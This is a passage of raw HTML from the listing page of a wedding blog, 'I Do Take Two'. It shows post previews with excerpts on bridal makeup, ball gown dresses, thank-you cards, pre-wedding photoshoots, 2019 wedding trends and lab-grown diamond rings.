content="https://www.idotaketwo.com/blog/wp-content/uploads/2019/04/IdoTakeTwo_Logo_275.png"> <meta itemprop="width" content="275"> <meta itemprop="height" content="53"> </div> <meta itemprop="name" content="I Do Take Two"> </div> <div itemprop='image' itemscope='itemscope' itemtype='https://schema.org/ImageObject'> <meta itemprop='url' content='https://i2.wp.com/www.idotaketwo.com/blog/wp-content/uploads/2019/02/Greece-Wedding.jpeg?fit=1920%2C1280&#038;ssl=1'/> <meta itemprop='width' content='1920'/> <meta itemprop='height' content='1280'/> </div> </div> </div> <div class="vw-flex-grid__item" data-slugs="wedding-beauty"> <div class="vw-post-box vw-post-box--block-a vw-inview post-9951 post type-post status-publish format-standard has-post-thumbnail hentry category-wedding-beauty tag-beauty tag-makeup" itemscope itemtype="https://schema.org/Article" > <div class="vw-post-box__inner"> <div class="vw-post-box__thumbnail-wrapper"> <div class="vw-post-box__thumbnail" > <img width="335" height="186" src="https://i0.wp.com/www.idotaketwo.com/blog/wp-content/uploads/2018/10/wedding-bride-makeup.jpg?resize=335%2C186&amp;ssl=1" class="attachment-presso_thumbnail_medium size-presso_thumbnail_medium wp-post-image" alt="" srcset="https://i0.wp.com/www.idotaketwo.com/blog/wp-content/uploads/2018/10/wedding-bride-makeup.jpg?resize=150%2C83&amp;ssl=1 150w, https://i0.wp.com/www.idotaketwo.com/blog/wp-content/uploads/2018/10/wedding-bride-makeup.jpg?resize=335%2C186&amp;ssl=1 335w, https://i0.wp.com/www.idotaketwo.com/blog/wp-content/uploads/2018/10/wedding-bride-makeup.jpg?resize=225%2C125&amp;ssl=1 225w, https://i0.wp.com/www.idotaketwo.com/blog/wp-content/uploads/2018/10/wedding-bride-makeup.jpg?zoom=2&amp;resize=335%2C186&amp;ssl=1 670w, https://i0.wp.com/www.idotaketwo.com/blog/wp-content/uploads/2018/10/wedding-bride-makeup.jpg?zoom=3&amp;resize=335%2C186&amp;ssl=1 1005w" sizes="(max-width: 335px) 100vw, 335px" itemprop="image" /> </div> <a href="https://www.idotaketwo.com/blog/4-beauty-tricks-to-remember-for-your-big-day" class="vw-post-box__overlay vw-post-box__overlay--link"> </a> </div> <div class="vw-post-box__content"> <div class="vw-categories"><a class=" vw-cat-id-1392" href="https://www.idotaketwo.com/blog/category/wedding-beauty/" title="View all posts in Wedding Beauty" rel="category">Wedding Beauty</a></div> <h3 class="vw-post-box__title" itemprop="headline" > <a class="vw-post-box__link" href="https://www.idotaketwo.com/blog/4-beauty-tricks-to-remember-for-your-big-day" itemprop="url" rel="bookmark"> 4 Beauty Tricks To Remember For Your Big Day </a> </h3> <div class="vw-post-box__meta"> <span class="vw-post-author" itemprop="author" > <a class="vw-avatar" href="https://www.idotaketwo.com/blog/author/erinr/" title="Posts by I Do Take Two"><img itemprop="image" src="https://i0.wp.com/www.idotaketwo.com/blog/wp-content/uploads/1496165362_female1.png?fit=16%2C16&amp;ssl=1" width="16" height="16" alt="I Do Take Two" class="avatar avatar-16 wp-user-avatar wp-user-avatar-16 alignnone photo" /></a> <a class="vw-post-author__name" href="https://www.idotaketwo.com/blog/author/erinr/" title="Posts by %s I Do Take Two" rel="author" itemprop="name" >I Do Take Two</a> </span> <a href="https://www.idotaketwo.com/blog/4-beauty-tricks-to-remember-for-your-big-day" class="vw-post-date updated" title="Permalink to 4 Beauty Tricks To Remember For Your Big Day" rel="bookmark"><time itemprop="datePublished" datetime="2019-02-23T22:01:57-04:00">February 23, 2019</time></a> </div> <div class="vw-post-box__excerpt"><p>Your wedding day is a celebration and confirmation of your relationship in front of all of your friends and family. It is a humbling and unforgettable experience that you will treasure for the rest of your life. There&#8217;s no doubt that the real power of the day comes from the deep commitment that you are &#8230;</p> </div> <div class="vw-post-box__footer vw-fixed-bar"> <div class="vw-bar__placeholder vw-bar__placeholder--left"> <a class="vw-post-box__read-more" href="https://www.idotaketwo.com/blog/4-beauty-tricks-to-remember-for-your-big-day"> Read More <i class="vw-icon icon-entypo-right-open"></i> </a> </div> <div class="vw-bar__placeholder vw-bar__placeholder--right"> <a class="vw-post-comment-count" href="https://www.idotaketwo.com/blog/4-beauty-tricks-to-remember-for-your-big-day#respond" title="Comments"> <i class="vw-icon icon-entypo-comment"></i> 0 </a> <meta itemprop="interactionCount" content="UserComments:0"/> <span class="vw-post-views"><i class="vw-icon icon-entypo-eye"></i> 3.5k</span> </div> </div> </div> </div> <meta itemprop="datePublished" content="2019-02-23T22:01:57-04:00"/><meta itemprop="dateModified" content="2019-02-23T22:03:03-04:00"/><meta itemprop="author" content="I Do Take Two"/><meta itemprop="interactionCount" content="UserComments:0"/> <div itemprop="publisher" itemscope itemtype="https://schema.org/Organization"> <div itemprop="logo" itemscope itemtype="https://schema.org/ImageObject"> <meta itemprop="url" content="https://www.idotaketwo.com/blog/wp-content/uploads/2019/04/IdoTakeTwo_Logo_275.png"> <meta itemprop="width" content="275"> <meta itemprop="height" content="53"> </div> <meta itemprop="name" content="I Do Take Two"> </div> <div itemprop='image' itemscope='itemscope' itemtype='https://schema.org/ImageObject'> <meta itemprop='url' content='https://i0.wp.com/www.idotaketwo.com/blog/wp-content/uploads/2018/10/wedding-bride-makeup.jpg?fit=2048%2C1364&#038;ssl=1'/> <meta itemprop='width' content='2048'/> <meta itemprop='height' content='1364'/> </div> </div> </div> <div class="vw-flex-grid__item" data-slugs="inspiration wedding-attire wedding-dress"> <div class="vw-post-box vw-post-box--block-a vw-inview post-9924 post type-post status-publish format-standard has-post-thumbnail hentry category-inspiration category-wedding-attire category-wedding-dress tag-wedding-dresses" itemscope itemtype="https://schema.org/Article" > <div class="vw-post-box__inner"> <div class="vw-post-box__thumbnail-wrapper"> <div class="vw-post-box__thumbnail" > <img width="335" height="186" src="https://i2.wp.com/www.idotaketwo.com/blog/wp-content/uploads/2019/02/modern-princess-ballgown-14.jpg?resize=335%2C186&amp;ssl=1" class="attachment-presso_thumbnail_medium size-presso_thumbnail_medium wp-post-image" alt="fall 2019 look 13 carolina herrera bridal" srcset="https://i2.wp.com/www.idotaketwo.com/blog/wp-content/uploads/2019/02/modern-princess-ballgown-14.jpg?resize=150%2C83&amp;ssl=1 150w, https://i2.wp.com/www.idotaketwo.com/blog/wp-content/uploads/2019/02/modern-princess-ballgown-14.jpg?resize=335%2C186&amp;ssl=1 335w, https://i2.wp.com/www.idotaketwo.com/blog/wp-content/uploads/2019/02/modern-princess-ballgown-14.jpg?resize=225%2C125&amp;ssl=1 225w, https://i2.wp.com/www.idotaketwo.com/blog/wp-content/uploads/2019/02/modern-princess-ballgown-14.jpg?zoom=2&amp;resize=335%2C186&amp;ssl=1 670w" sizes="(max-width: 335px) 100vw, 335px" itemprop="image" /> </div> <a href="https://www.idotaketwo.com/blog/21-princess-ball-gown-wedding-dresses-for-the-modern-bride/" class="vw-post-box__overlay vw-post-box__overlay--link"> </a> </div> <div class="vw-post-box__content"> <div class="vw-categories"><a class=" vw-cat-id-95" href="https://www.idotaketwo.com/blog/category/inspiration/" title="View all posts in Inspiration" rel="category">Inspiration</a><a class=" vw-cat-id-95 vw-cat-id-6" href="https://www.idotaketwo.com/blog/category/wedding-attire/" title="View all posts in Wedding Attire" rel="category">Wedding Attire</a><a class=" vw-cat-id-95 vw-cat-id-6 vw-cat-id-1281" href="https://www.idotaketwo.com/blog/category/wedding-dress/" title="View all posts in Wedding Dress" rel="category">Wedding Dress</a></div> <h3 class="vw-post-box__title" itemprop="headline" > <a class="vw-post-box__link" href="https://www.idotaketwo.com/blog/21-princess-ball-gown-wedding-dresses-for-the-modern-bride/" itemprop="url" rel="bookmark"> 21 Princess Ball Gown Wedding Dresses for the Modern Bride </a> </h3> <div class="vw-post-box__meta"> <span class="vw-post-author" itemprop="author" > <a class="vw-avatar" href="https://www.idotaketwo.com/blog/author/gracelynne/" title="Posts by Grace Lynne Fleming"><img itemprop="image" src="http://1.gravatar.com/avatar/ddeb668258f69fdbc014b0179f99c1f0?s=16&#038;d=mm&#038;r=g" width="16" height="16" alt="Grace Lynne Fleming" class="avatar avatar-16 wp-user-avatar wp-user-avatar-16 photo avatar-default" /></a> <a class="vw-post-author__name" href="https://www.idotaketwo.com/blog/author/gracelynne/" title="Posts by %s Grace Lynne Fleming" rel="author" itemprop="name" >Grace Lynne Fleming</a> </span> <a href="https://www.idotaketwo.com/blog/21-princess-ball-gown-wedding-dresses-for-the-modern-bride/" class="vw-post-date updated" title="Permalink to 21 Princess Ball Gown Wedding Dresses for the Modern Bride" rel="bookmark"><time itemprop="datePublished" datetime="2019-02-15T11:08:46-04:00">February 15, 2019</time></a> </div> <div class="vw-post-box__excerpt"><p>We cannot predict a time when the ball gown will ever go out of style in the wedding world. It’s one of the most popular silhouettes and the vision that little girls have while growing up and daydreaming about their future wedding day. What is changing about the genres of princess designs though? From those &#8230;</p> </div> <div class="vw-post-box__footer vw-fixed-bar"> <div class="vw-bar__placeholder vw-bar__placeholder--left"> <a class="vw-post-box__read-more" href="https://www.idotaketwo.com/blog/21-princess-ball-gown-wedding-dresses-for-the-modern-bride/"> Read More <i class="vw-icon icon-entypo-right-open"></i> </a> </div> <div class="vw-bar__placeholder vw-bar__placeholder--right"> <a class="vw-post-comment-count" href="https://www.idotaketwo.com/blog/21-princess-ball-gown-wedding-dresses-for-the-modern-bride/#respond" title="Comments"> <i class="vw-icon icon-entypo-comment"></i> 0 </a> <meta itemprop="interactionCount" content="UserComments:0"/> <span class="vw-post-views"><i class="vw-icon icon-entypo-eye"></i> 3.5k</span> </div> </div> </div> </div> <meta itemprop="datePublished" content="2019-02-15T11:08:46-04:00"/><meta itemprop="dateModified" content="2019-05-07T18:01:41-04:00"/><meta itemprop="author" content="Grace Lynne Fleming"/><meta itemprop="interactionCount" content="UserComments:0"/> <div itemprop="publisher" itemscope itemtype="https://schema.org/Organization"> <div itemprop="logo" itemscope itemtype="https://schema.org/ImageObject"> <meta itemprop="url" content="https://www.idotaketwo.com/blog/wp-content/uploads/2019/04/IdoTakeTwo_Logo_275.png"> <meta itemprop="width" content="275"> <meta itemprop="height" content="53"> </div> <meta itemprop="name" content="I Do Take Two"> </div> <div itemprop='image' itemscope='itemscope' itemtype='https://schema.org/ImageObject'> <meta itemprop='url' content='https://i2.wp.com/www.idotaketwo.com/blog/wp-content/uploads/2019/02/modern-princess-ballgown-14.jpg?fit=700%2C1050&#038;ssl=1'/> <meta itemprop='width' content='700'/> <meta itemprop='height' content='1050'/> </div> </div> </div> <div class="vw-flex-grid__item" data-slugs="card-idea etiquette-planning inspiration wedding-planning-2"> <div class="vw-post-box vw-post-box--block-a vw-inview post-9918 post type-post status-publish format-standard has-post-thumbnail hentry category-card-idea category-etiquette-planning category-inspiration category-wedding-planning-2" itemscope itemtype="https://schema.org/Article" > <div class="vw-post-box__inner"> <div class="vw-post-box__thumbnail-wrapper"> <div class="vw-post-box__thumbnail" > <img width="335" height="186" src="https://i2.wp.com/www.idotaketwo.com/blog/wp-content/uploads/2019/01/wedding-thank-you-card-wording.jpg?resize=335%2C186&amp;ssl=1" class="attachment-presso_thumbnail_medium size-presso_thumbnail_medium wp-post-image" alt="thank you card examples" srcset="https://i2.wp.com/www.idotaketwo.com/blog/wp-content/uploads/2019/01/wedding-thank-you-card-wording.jpg?resize=150%2C83&amp;ssl=1 150w, https://i2.wp.com/www.idotaketwo.com/blog/wp-content/uploads/2019/01/wedding-thank-you-card-wording.jpg?resize=335%2C186&amp;ssl=1 335w, https://i2.wp.com/www.idotaketwo.com/blog/wp-content/uploads/2019/01/wedding-thank-you-card-wording.jpg?resize=225%2C125&amp;ssl=1 225w, https://i2.wp.com/www.idotaketwo.com/blog/wp-content/uploads/2019/01/wedding-thank-you-card-wording.jpg?zoom=2&amp;resize=335%2C186&amp;ssl=1 670w, https://i2.wp.com/www.idotaketwo.com/blog/wp-content/uploads/2019/01/wedding-thank-you-card-wording.jpg?zoom=3&amp;resize=335%2C186&amp;ssl=1 1005w" sizes="(max-width: 335px) 100vw, 335px" itemprop="image" /> </div> <a href="https://www.idotaketwo.com/blog/10-wedding-thank-you-card-examples-youll-love/" class="vw-post-box__overlay vw-post-box__overlay--link"> </a> </div> <div class="vw-post-box__content"> <div class="vw-categories"><a class=" vw-cat-id-1407" href="https://www.idotaketwo.com/blog/category/card-idea/" title="View all posts in Card Idea" rel="category">Card Idea</a><a class=" vw-cat-id-1407 vw-cat-id-5" href="https://www.idotaketwo.com/blog/category/etiquette-planning/" title="View all posts in Etiquette &amp; Planning" rel="category">Etiquette &amp; Planning</a><a class=" vw-cat-id-1407 vw-cat-id-5 vw-cat-id-95" href="https://www.idotaketwo.com/blog/category/inspiration/" title="View all posts in Inspiration" rel="category">Inspiration</a><a class=" vw-cat-id-1407 vw-cat-id-5 vw-cat-id-95 vw-cat-id-163" href="https://www.idotaketwo.com/blog/category/wedding-planning-2/" title="View all posts in Wedding Planning" rel="category">Wedding Planning</a></div> <h3 class="vw-post-box__title" itemprop="headline" > <a class="vw-post-box__link" href="https://www.idotaketwo.com/blog/10-wedding-thank-you-card-examples-youll-love/" itemprop="url" rel="bookmark"> 10 Wedding Thank-You Card Examples You&#8217;ll Love </a> </h3> <div class="vw-post-box__meta"> <span class="vw-post-author" itemprop="author" > <a class="vw-avatar" href="https://www.idotaketwo.com/blog/author/gracelynne/" title="Posts by Grace Lynne Fleming"><img itemprop="image" src="http://1.gravatar.com/avatar/ddeb668258f69fdbc014b0179f99c1f0?s=16&#038;d=mm&#038;r=g" width="16" height="16" alt="Grace Lynne Fleming" class="avatar avatar-16 wp-user-avatar wp-user-avatar-16 photo avatar-default" /></a> <a class="vw-post-author__name" href="https://www.idotaketwo.com/blog/author/gracelynne/" title="Posts by %s Grace Lynne Fleming" rel="author" itemprop="name" >Grace Lynne Fleming</a> </span> <a href="https://www.idotaketwo.com/blog/10-wedding-thank-you-card-examples-youll-love/" class="vw-post-date updated" title="Permalink to 10 Wedding Thank-You Card Examples You&#8217;ll Love" rel="bookmark"><time itemprop="datePublished" datetime="2019-01-23T11:04:17-04:00">January 23, 2019</time></a> </div> <div class="vw-post-box__excerpt"><p>One of the most tedious and necessary parts of the wedding process is the writing of the thank you cards. Even though they can be a lot of work, you really need to make sure you check this off your list of to do’s &#8211; you’ll feel so much better once they’re signed, sealed, and &#8230;</p> </div> <div class="vw-post-box__footer vw-fixed-bar"> <div class="vw-bar__placeholder vw-bar__placeholder--left"> <a class="vw-post-box__read-more" href="https://www.idotaketwo.com/blog/10-wedding-thank-you-card-examples-youll-love/"> Read More <i class="vw-icon icon-entypo-right-open"></i> </a> </div> <div class="vw-bar__placeholder vw-bar__placeholder--right"> <a class="vw-post-comment-count" href="https://www.idotaketwo.com/blog/10-wedding-thank-you-card-examples-youll-love/#respond" title="Comments"> <i class="vw-icon icon-entypo-comment"></i> 0 </a> <meta itemprop="interactionCount" content="UserComments:0"/> <span class="vw-post-views"><i class="vw-icon icon-entypo-eye"></i> 3.5k</span> </div> </div> </div> </div> <meta itemprop="datePublished" content="2019-01-23T11:04:17-04:00"/><meta itemprop="dateModified" content="2019-05-07T17:49:21-04:00"/><meta itemprop="author" content="Grace Lynne Fleming"/><meta itemprop="interactionCount" content="UserComments:0"/> <div itemprop="publisher" itemscope itemtype="https://schema.org/Organization"> <div itemprop="logo" itemscope itemtype="https://schema.org/ImageObject"> <meta itemprop="url" content="https://www.idotaketwo.com/blog/wp-content/uploads/2019/04/IdoTakeTwo_Logo_275.png"> <meta itemprop="width" content="275"> <meta itemprop="height" content="53"> </div> <meta itemprop="name" content="I Do Take Two"> </div> <div itemprop='image' itemscope='itemscope' itemtype='https://schema.org/ImageObject'> <meta itemprop='url' content='https://i2.wp.com/www.idotaketwo.com/blog/wp-content/uploads/2019/01/wedding-thank-you-card-wording.jpg?fit=1200%2C857&#038;ssl=1'/> <meta itemprop='width' content='1200'/> <meta itemprop='height' content='857'/> </div> </div> </div> <div class="vw-flex-grid__item" data-slugs="photography"> <div class="vw-post-box vw-post-box--block-a vw-inview post-9898 post type-post status-publish format-standard has-post-thumbnail hentry category-photography tag-engagement-photos tag-photo-booth tag-photo-shoot tag-phototgraphy" itemscope itemtype="https://schema.org/Article" > <div class="vw-post-box__inner"> <div class="vw-post-box__thumbnail-wrapper"> <div class="vw-post-box__thumbnail" > <img width="335" height="186" src="https://i1.wp.com/www.idotaketwo.com/blog/wp-content/uploads/2019/01/Use-Props-or-Symbols-.jpg?resize=335%2C186&amp;ssl=1" class="attachment-presso_thumbnail_medium size-presso_thumbnail_medium wp-post-image" alt="" srcset="https://i1.wp.com/www.idotaketwo.com/blog/wp-content/uploads/2019/01/Use-Props-or-Symbols-.jpg?resize=150%2C83&amp;ssl=1 150w, https://i1.wp.com/www.idotaketwo.com/blog/wp-content/uploads/2019/01/Use-Props-or-Symbols-.jpg?resize=335%2C186&amp;ssl=1 335w, https://i1.wp.com/www.idotaketwo.com/blog/wp-content/uploads/2019/01/Use-Props-or-Symbols-.jpg?resize=225%2C125&amp;ssl=1 225w, https://i1.wp.com/www.idotaketwo.com/blog/wp-content/uploads/2019/01/Use-Props-or-Symbols-.jpg?zoom=2&amp;resize=335%2C186&amp;ssl=1 670w, https://i1.wp.com/www.idotaketwo.com/blog/wp-content/uploads/2019/01/Use-Props-or-Symbols-.jpg?zoom=3&amp;resize=335%2C186&amp;ssl=1 1005w" sizes="(max-width: 335px) 100vw, 335px" itemprop="image" /> </div> <a href="https://www.idotaketwo.com/blog/pre-wedding-photoshoot-ideas/" class="vw-post-box__overlay vw-post-box__overlay--link"> </a> </div> <div class="vw-post-box__content"> <div class="vw-categories"><a class=" vw-cat-id-1379" href="https://www.idotaketwo.com/blog/category/photography/" title="View all posts in Photography" rel="category">Photography</a></div> <h3 class="vw-post-box__title" itemprop="headline" > <a class="vw-post-box__link" href="https://www.idotaketwo.com/blog/pre-wedding-photoshoot-ideas/" itemprop="url" rel="bookmark"> Pre-Wedding Photoshoot Ideas </a> </h3> <div class="vw-post-box__meta"> <span class="vw-post-author" itemprop="author" > <a class="vw-avatar" href="https://www.idotaketwo.com/blog/author/erinr/" title="Posts by I Do Take Two"><img itemprop="image" src="https://i0.wp.com/www.idotaketwo.com/blog/wp-content/uploads/1496165362_female1.png?fit=16%2C16&amp;ssl=1" width="16" height="16" alt="I Do Take Two" class="avatar avatar-16 wp-user-avatar wp-user-avatar-16 alignnone photo" /></a> <a class="vw-post-author__name" href="https://www.idotaketwo.com/blog/author/erinr/" title="Posts by %s I Do Take Two" rel="author" itemprop="name" >I Do Take Two</a> </span> <a href="https://www.idotaketwo.com/blog/pre-wedding-photoshoot-ideas/" class="vw-post-date updated" title="Permalink to Pre-Wedding Photoshoot Ideas" rel="bookmark"><time itemprop="datePublished" datetime="2019-01-14T15:09:09-04:00">January 14, 2019</time></a> </div> <div class="vw-post-box__excerpt"><p>&nbsp; Being lucky enough to live in the digital age, photos are an important part of everyday life, allowing us to document all the best moments and sometimes the ones we’d rather forget! If your wedding day is fast approaching, the pre-wedding photo shoot is probably on your mind and you may be wondering where &#8230;</p> </div> <div class="vw-post-box__footer vw-fixed-bar"> <div class="vw-bar__placeholder vw-bar__placeholder--left"> <a class="vw-post-box__read-more" href="https://www.idotaketwo.com/blog/pre-wedding-photoshoot-ideas/"> Read More <i class="vw-icon icon-entypo-right-open"></i> </a> </div> <div class="vw-bar__placeholder vw-bar__placeholder--right"> <a class="vw-post-comment-count" href="https://www.idotaketwo.com/blog/pre-wedding-photoshoot-ideas/#respond" title="Comments"> <i class="vw-icon icon-entypo-comment"></i> 0 </a> <meta itemprop="interactionCount" content="UserComments:0"/> <span class="vw-post-views"><i class="vw-icon icon-entypo-eye"></i> 3.5k</span> </div> </div> </div> </div> <meta itemprop="datePublished" content="2019-01-14T15:09:09-04:00"/><meta itemprop="dateModified" content="2019-01-14T15:10:24-04:00"/><meta itemprop="author" content="I Do Take Two"/><meta itemprop="interactionCount" content="UserComments:0"/> <div itemprop="publisher" itemscope itemtype="https://schema.org/Organization"> <div itemprop="logo" itemscope itemtype="https://schema.org/ImageObject"> <meta itemprop="url" content="https://www.idotaketwo.com/blog/wp-content/uploads/2019/04/IdoTakeTwo_Logo_275.png"> <meta itemprop="width" content="275"> <meta itemprop="height" content="53"> </div> <meta itemprop="name" content="I Do Take Two"> </div> <div itemprop='image' itemscope='itemscope' itemtype='https://schema.org/ImageObject'> <meta itemprop='url' content='https://i1.wp.com/www.idotaketwo.com/blog/wp-content/uploads/2019/01/Use-Props-or-Symbols-.jpg?fit=1280%2C1600&#038;ssl=1'/> <meta itemprop='width' content='1280'/> <meta itemprop='height' content='1600'/> </div> </div> </div> <div class="vw-flex-grid__item" data-slugs="decoration inspiration wedding-decor wedding-makeup"> <div class="vw-post-box vw-post-box--block-a vw-inview post-9892 post type-post status-publish format-standard has-post-thumbnail hentry category-decoration category-inspiration category-wedding-decor category-wedding-makeup tag-1403 tag-inspiration-2 tag-trends tag-wedding" itemscope itemtype="https://schema.org/Article" > <div class="vw-post-box__inner"> <div class="vw-post-box__thumbnail-wrapper"> <div class="vw-post-box__thumbnail" > <img width="335" height="186" src="https://i2.wp.com/www.idotaketwo.com/blog/wp-content/uploads/2019/01/Karina-Papadopoulus-Dress-to-make-a-statement.jpg?resize=335%2C186&amp;ssl=1" class="attachment-presso_thumbnail_medium size-presso_thumbnail_medium wp-post-image" alt="" srcset="https://i2.wp.com/www.idotaketwo.com/blog/wp-content/uploads/2019/01/Karina-Papadopoulus-Dress-to-make-a-statement.jpg?resize=150%2C83&amp;ssl=1 150w, https://i2.wp.com/www.idotaketwo.com/blog/wp-content/uploads/2019/01/Karina-Papadopoulus-Dress-to-make-a-statement.jpg?resize=335%2C186&amp;ssl=1 335w, https://i2.wp.com/www.idotaketwo.com/blog/wp-content/uploads/2019/01/Karina-Papadopoulus-Dress-to-make-a-statement.jpg?resize=225%2C125&amp;ssl=1 225w, https://i2.wp.com/www.idotaketwo.com/blog/wp-content/uploads/2019/01/Karina-Papadopoulus-Dress-to-make-a-statement.jpg?zoom=2&amp;resize=335%2C186&amp;ssl=1 670w, https://i2.wp.com/www.idotaketwo.com/blog/wp-content/uploads/2019/01/Karina-Papadopoulus-Dress-to-make-a-statement.jpg?zoom=3&amp;resize=335%2C186&amp;ssl=1 1005w" sizes="(max-width: 335px) 100vw, 335px" itemprop="image" /> </div> <a href="https://www.idotaketwo.com/blog/everything-you-need-to-know-about-2019-wedding-trends" class="vw-post-box__overlay vw-post-box__overlay--link"> </a> </div> <div class="vw-post-box__content"> <div class="vw-categories"><a class=" vw-cat-id-1321" href="https://www.idotaketwo.com/blog/category/decoration/" title="View all posts in Decoration" rel="category">Decoration</a><a class=" vw-cat-id-1321 vw-cat-id-95" href="https://www.idotaketwo.com/blog/category/inspiration/" title="View all posts in Inspiration" rel="category">Inspiration</a><a class=" vw-cat-id-1321 vw-cat-id-95 vw-cat-id-1331" href="https://www.idotaketwo.com/blog/category/wedding-decor/" title="View all posts in Wedding Decor" rel="category">Wedding Decor</a><a class=" vw-cat-id-1321 vw-cat-id-95 vw-cat-id-1331 vw-cat-id-1386" href="https://www.idotaketwo.com/blog/category/wedding-makeup/" title="View all posts in Wedding Makeup" rel="category">Wedding Makeup</a></div> <h3 class="vw-post-box__title" itemprop="headline" > <a class="vw-post-box__link" href="https://www.idotaketwo.com/blog/everything-you-need-to-know-about-2019-wedding-trends" itemprop="url" rel="bookmark"> Everything You Need to Know About 2019 Wedding Trends </a> </h3> <div class="vw-post-box__meta"> <span class="vw-post-author" itemprop="author" > <a class="vw-avatar" href="https://www.idotaketwo.com/blog/author/erinr/" title="Posts by I Do Take Two"><img itemprop="image" src="https://i0.wp.com/www.idotaketwo.com/blog/wp-content/uploads/1496165362_female1.png?fit=16%2C16&amp;ssl=1" width="16" height="16" alt="I Do Take Two" class="avatar avatar-16 wp-user-avatar wp-user-avatar-16 alignnone photo" /></a> <a class="vw-post-author__name" href="https://www.idotaketwo.com/blog/author/erinr/" title="Posts by %s I Do Take Two" rel="author" itemprop="name" >I Do Take Two</a> </span> <a href="https://www.idotaketwo.com/blog/everything-you-need-to-know-about-2019-wedding-trends" class="vw-post-date updated" title="Permalink to Everything You Need to Know About 2019 Wedding Trends" rel="bookmark"><time itemprop="datePublished" datetime="2019-01-14T10:14:03-04:00">January 14, 2019</time></a> </div> <div class="vw-post-box__excerpt"><p>Wedding trends ebb and flow like the tides and every year sees new styles taking center stage. If you’re getting remarried, chances are that things are very different this time around. Between the growth of technology and an increasingly global community, the possibilities are virtually endless — and couples are truly taking advantage of the &#8230;</p> </div> <div class="vw-post-box__footer vw-fixed-bar"> <div class="vw-bar__placeholder vw-bar__placeholder--left"> <a class="vw-post-box__read-more" href="https://www.idotaketwo.com/blog/everything-you-need-to-know-about-2019-wedding-trends"> Read More <i class="vw-icon icon-entypo-right-open"></i> </a> </div> <div class="vw-bar__placeholder vw-bar__placeholder--right"> <a class="vw-post-comment-count" href="https://www.idotaketwo.com/blog/everything-you-need-to-know-about-2019-wedding-trends#respond" title="Comments"> <i class="vw-icon icon-entypo-comment"></i> 0 </a> <meta itemprop="interactionCount" content="UserComments:0"/> <span class="vw-post-views"><i class="vw-icon icon-entypo-eye"></i> 3.5k</span> </div> </div> </div> </div> <meta itemprop="datePublished" content="2019-01-14T10:14:03-04:00"/><meta itemprop="dateModified" content="2019-01-14T10:14:45-04:00"/><meta itemprop="author" content="I Do Take Two"/><meta itemprop="interactionCount" content="UserComments:0"/> <div itemprop="publisher" itemscope itemtype="https://schema.org/Organization"> <div itemprop="logo" itemscope itemtype="https://schema.org/ImageObject"> <meta itemprop="url" content="https://www.idotaketwo.com/blog/wp-content/uploads/2019/04/IdoTakeTwo_Logo_275.png"> <meta itemprop="width" content="275"> <meta itemprop="height" content="53"> </div> <meta itemprop="name" content="I Do Take Two"> </div> <div itemprop='image' itemscope='itemscope' itemtype='https://schema.org/ImageObject'> <meta itemprop='url' content='https://i2.wp.com/www.idotaketwo.com/blog/wp-content/uploads/2019/01/Karina-Papadopoulus-Dress-to-make-a-statement.jpg?fit=1116%2C1500&#038;ssl=1'/> <meta itemprop='width' content='1116'/> <meta itemprop='height' content='1500'/> </div> </div> </div> <div class="vw-flex-grid__item" data-slugs="wedding-jewelry"> <div class="vw-post-box vw-post-box--block-a vw-inview post-9883 post type-post status-publish format-standard has-post-thumbnail hentry category-wedding-jewelry tag-bridal-jewelry tag-clean-origin tag-diamonds tag-emerald-cut-diamonds" itemscope itemtype="https://schema.org/Article" > <div class="vw-post-box__inner"> <div class="vw-post-box__thumbnail-wrapper"> <div class="vw-post-box__thumbnail" > <img width="335" height="186" src="https://i2.wp.com/www.idotaketwo.com/blog/wp-content/uploads/2019/01/man-made-diamond.jpg?resize=335%2C186&amp;ssl=1" class="attachment-presso_thumbnail_medium size-presso_thumbnail_medium wp-post-image" alt="" srcset="https://i2.wp.com/www.idotaketwo.com/blog/wp-content/uploads/2019/01/man-made-diamond.jpg?resize=150%2C83&amp;ssl=1 150w, https://i2.wp.com/www.idotaketwo.com/blog/wp-content/uploads/2019/01/man-made-diamond.jpg?resize=335%2C186&amp;ssl=1 335w, https://i2.wp.com/www.idotaketwo.com/blog/wp-content/uploads/2019/01/man-made-diamond.jpg?resize=225%2C125&amp;ssl=1 225w, https://i2.wp.com/www.idotaketwo.com/blog/wp-content/uploads/2019/01/man-made-diamond.jpg?zoom=2&amp;resize=335%2C186&amp;ssl=1 670w, https://i2.wp.com/www.idotaketwo.com/blog/wp-content/uploads/2019/01/man-made-diamond.jpg?zoom=3&amp;resize=335%2C186&amp;ssl=1 1005w" sizes="(max-width: 335px) 100vw, 335px" itemprop="image" /> </div> <a href="https://www.idotaketwo.com/blog/lab-grown-diamond-ring-re-do" class="vw-post-box__overlay vw-post-box__overlay--link"> </a> </div> <div class="vw-post-box__content"> <div class="vw-categories"><a class=" vw-cat-id-1289" href="https://www.idotaketwo.com/blog/category/wedding-jewelry/" title="View all posts in Wedding Jewelry" rel="category">Wedding Jewelry</a></div> <h3 class="vw-post-box__title" itemprop="headline" > <a class="vw-post-box__link" href="https://www.idotaketwo.com/blog/lab-grown-diamond-ring-re-do" itemprop="url" rel="bookmark"> A Ring Re-Do </a> </h3> <div class="vw-post-box__meta"> <span class="vw-post-author" itemprop="author" > <a class="vw-avatar" href="https://www.idotaketwo.com/blog/author/erinr/" title="Posts by I Do Take Two"><img itemprop="image" src="https://i0.wp.com/www.idotaketwo.com/blog/wp-content/uploads/1496165362_female1.png?fit=16%2C16&amp;ssl=1" width="16" height="16" alt="I Do Take Two" class="avatar avatar-16 wp-user-avatar wp-user-avatar-16 alignnone photo" /></a> <a class="vw-post-author__name" href="https://www.idotaketwo.com/blog/author/erinr/" title="Posts by %s I Do Take Two" rel="author" itemprop="name" >I Do Take Two</a> </span> <a href="https://www.idotaketwo.com/blog/lab-grown-diamond-ring-re-do" class="vw-post-date updated" title="Permalink to A Ring Re-Do" rel="bookmark"><time itemprop="datePublished" datetime="2019-01-10T14:17:33-04:00">January 10, 2019</time></a> </div> <div class="vw-post-box__excerpt"><p>Looking back, you might be thinking, “how in the world did I choose that engagement ring?!” Thankfully, over the past few years, new styles and technologies have emerged in the diamond industry that have widened the engagement ring pool of options. Today, we’re going to review some of those changes and highlight some great styles &#8230;</p> </div> <div class="vw-post-box__footer vw-fixed-bar"> <div class="vw-bar__placeholder vw-bar__placeholder--left"> <a class="vw-post-box__read-more" href="https://www.idotaketwo.com/blog/lab-grown-diamond-ring-re-do"> Read More <i class="vw-icon icon-entypo-right-open"></i> </a> </div> <div class="vw-bar__placeholder vw-bar__placeholder--right"> <a class="vw-post-comment-count" href="https://www.idotaketwo.com/blog/lab-grown-diamond-ring-re-do#respond" title="Comments"> <i class="vw-icon 